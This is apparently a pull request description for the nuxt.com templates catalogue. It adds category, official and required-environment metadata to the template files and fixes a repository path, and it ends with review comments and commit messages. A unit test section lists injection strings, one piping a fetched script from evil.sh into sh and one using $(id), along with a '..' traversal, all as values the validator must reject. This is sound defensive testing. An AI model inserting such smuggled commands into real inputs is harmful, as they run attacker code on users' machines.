First of four stacked PRs that make nuxt.com/templates the place to start a Nuxt project, so nuxt.new can retire. This one only adds data to the existing template files, so the next three can rely on it. The current page ignores the new keys and looks the same.

Each template gains:

  • category: one of app, dashboard, ecommerce, saas, portfolio, content, landing, docs or ai. The redesigned page filters on it.
  • official: true on the templates the Nuxt team maintains.
  • deploy.env on the templates that need secrets to run. The daily check builds them but doesn't start them, and the redesign tells people about the variables before they deploy.

It also fixes nuxt-shopify: source: 'gh:nuxt-modules/shopify/template' points create nuxt and Deploy to Vercel at the app instead of the module.

deploy.env follows each template's own .env.example:

  • nuxt-shopify lists its customer-account client ID and session password too. The template marks the password as required in production.
  • nuxt-ui-editor lists nothing: its PartyKit host only turns on optional collaboration. Without required variables, the daily check also starts it, so it can get a live preview.
  • nuxt-books, added on main since, gets category: 'app'.

The current page is unchanged

Production on the left, this branch on the right, both at 1440×900. Both render 43 of the 43 template names; they were taken before main added nuxt-books.

Before (nuxt.com/templates) After (this branch)
Before After

The new metadata

Printed by a script that reads every content/templates/*.yml on this branch:

templates: 44 | official: 12 | paid: 12
app 10
dashboard 7
ecommerce 5
saas 5
portfolio 4
content 4
landing 4
docs 3
ai 2
needs env to deploy: agency-os (6), nuxt-shopify (5), canvas (4), nuxt-ui-chat (3)

Why nuxt-shopify needs source

The repository root is the module (src/, build.config.ts, playgrounds/), and the app lives in template/:

$ gh api repos/nuxt-modules/shopify/contents --jq '[.[].name] | join(" ")'
.editorconfig .env.example .envrc .github .gitignore LICENSE README.md SECURITY.md build.config.ts dev docs eslint.config.mjs graphql.config.mjs knip.json nuxt.config.ts package.json playgrounds pnpm-lock.yaml pnpm-workspace.yaml shell.nix src template test tsconfig.json vitest.config.mts

$ gh api repos/nuxt-modules/shopify/contents/template --jq '[.[].name] | join(" ")'
.env.example .gitignore README.md app eslint.config.mjs graphql.config.mjs graphql i18n modules nuxt.config.ts package.json public shared tsconfig.json

A test for the template files

These values end up in the create nuxt command people paste into a terminal, in deploy links, and in the commands the daily check runs in its sandboxes. So test/unit/templates-content.spec.ts checks every template file:

  • The slug, repository, branch and source only use letters, digits, ., - and _, and never a .. segment.
  • demo and purchase are HTTPS links, and deploy.repositoryUrl points to a GitHub repository.
  • category is one of the nine categories, official is a boolean, and deploy.env is a list of variable names.
expect(segments('owner/repo; curl evil.sh | sh', 2)).toBe(false)
expect(segments('owner/$(id)', 2)).toBe(false)
expect(segments('main/../other')).toBe(false)
expect(segments('nuxt/starter', 2)).toBe(true)

pnpm lint, pnpm typecheck and pnpm vitest run test/unit (471 tests) pass locally on this branch, with main merged in.

Stack: this PR, then #2518, then #2519, then #2542.

ELI5

Every template on the site is described by a small text file. This PR adds a few labels to those files, like what kind of app it is and what secrets it needs. Nothing on the website changes yet; the next PRs use these labels.

Reject parent-directory segments in deployment URLs.

The repositoryUrl regex accepts https://github.com/acme/repo/tree/../other because [\w./-]+ permits ... The current fixtures do not exercise this value, so this is a test-coverage gap rather than a failing fixture. Validate the captured tree path with segments().

Require deploy.env to be an array.

If YAML declares env: TOKEN, parseYAML returns a string. The loop then checks each character separately, so the malformed value passes. Assert Array.isArray(data.deploy.env) before checking its names.

26-45: 🗄️ Data Integrity & Integration | 🔵 Trivial | ⚡ Quick win

Assert the new template metadata fields.

The test loads category and official but never validates them. Invalid values can pass the test because parseYAML<Record<string, any>> leaves the records untyped. listByDir('/templates') then forwards all metadata into the template catalog. Add assertions for the allowed categories and boolean official values.

…o templates

Every template gets a `category`, official ones get `official: true`, and the ones that need secrets to run list them under `deploy.env`.

nuxt-shopify now points `create nuxt` at the repository's `template/` folder: its root is the module itself, so the command gave people the module source instead of the app.
…loyable without PartyKit and categorise NuxtBooks
